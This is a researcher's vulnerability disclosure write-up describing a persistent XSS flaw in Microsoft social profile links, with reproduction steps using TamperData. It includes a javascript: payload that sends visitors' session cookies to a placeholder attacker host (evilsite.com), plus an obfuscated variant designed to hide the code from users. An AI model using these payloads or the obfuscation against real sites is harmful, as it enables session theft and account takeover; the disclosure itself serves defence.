Get your Microsoft account hijacked by simply clicking connect button -Adesh Kolte

Hello

I am Adesh Nandkishor Kolte

An Independent Cyber Security Resercher

The following is my 2nd Write up on a Microsoft serious vulnerability which I had discovered on Microsoft.com, for which I was also awarded a place at Microsoft Hall of Fame.

Vulnerability Type: Persistent XSS
 
 Affected URL: https://social.microsoft.com/Profile/ADESH_Test_Account
 https://social.msdn.microsoft.com/Profile/ADESH_Test_Account
 
 Abstract: The affected URL is vulnerable to persistent XSS due to which an attacker is able to hijack user account sessions.
 
 Scope: Social Connect buttons( Twitter, Facebook, LinkedIn) of affected URL.
 
 Risk Level: Medium-High
 
 Vulnerability Impact Scenario: A user visits an affected profile, and clicks the facebook icon under contact section after which he is redirected to attacker’s facebook profile which is normal for the user. But in the backend, his session cookies were sent as a get request to the attacker’s webserver where they were stored, after that the user was redirected to the attacker’s facebook profile as he was expecting.
 
 Payload: javascript:location.href=(“http://evilsite.com?q.php?cookie="+document.cookie) 
 
 Obfuscated Payload: javascript:/*http://facebook.com/profile.php?id=6735824l987&
 redirect=*/location.href%3D%28%22http%3A%2f%2fevilsite.com%3Fq.php%3Fcookie%3D%22%2bdocument.cookie%29
 (Contains noise and obsfucated code so that a normal user is not able to identify the malicious code by just hovering over the social buttons)
 
 Tools Used:
 Firefox +Addon: TamperData

 Vulnerability Reproduction Steps(POC): 
 
 1. Visit the URL “https://social.microsoft.com/Profile/u/edit" 
 
 2. Add facebook profile URL such as, “http://facebook/com/demouser" 
 
 3. Open TamperData a and click “Start Tampering”, after that click “submit” on the edit page.
 
 4. Tamper the post request sent by the following url: “https://social.microsoft.com/Profile/u/edit?displayName=MSOBB_Test_Account" 
 
 5. Modify the following post parameter: name=”SocialLink_Facebook”\r\n\r\nhttp://facebook/com/demouser\r\n-------- and replace it by our Payload(Mentioned Above)
 
 6. Open TamperData and click “Stop Tampering” .
 
 7. Now our malicious javascript code is embedded with our social profile button.
 
 8. Now attack will be performed whenever some user tries to connect with us through our social profile buttons.
 
 Brief description of the issue: The vulnerability i am reporting is caused due to only client side and no server side input validation of the social profile link at the Affected URL, by modifying the http headers of the post request an attacker is able to provide his own custom malicious code in place of the social profile URL which can be used to capture the session cookies of the logged in user.
 
 By capturing the session cookies an attacker is able to completely take over the user's microsoft account and most of his microsoft connected services (Tested with Outlook)
 
 During my research i have also discovered that the Microsoft Social homepage(https://social.microsoft.com/Profile/) shows a leaderboard of Most Active Contributors. These contributors get visited daily by mass amount of users, if an attacker is able to get his malicious profile on the list then a large amount of users can be affected by this vulnerability which is a very serious issue and a cause of concern.

Pooc:

Hall Of Fame:

Thanks For Reading :)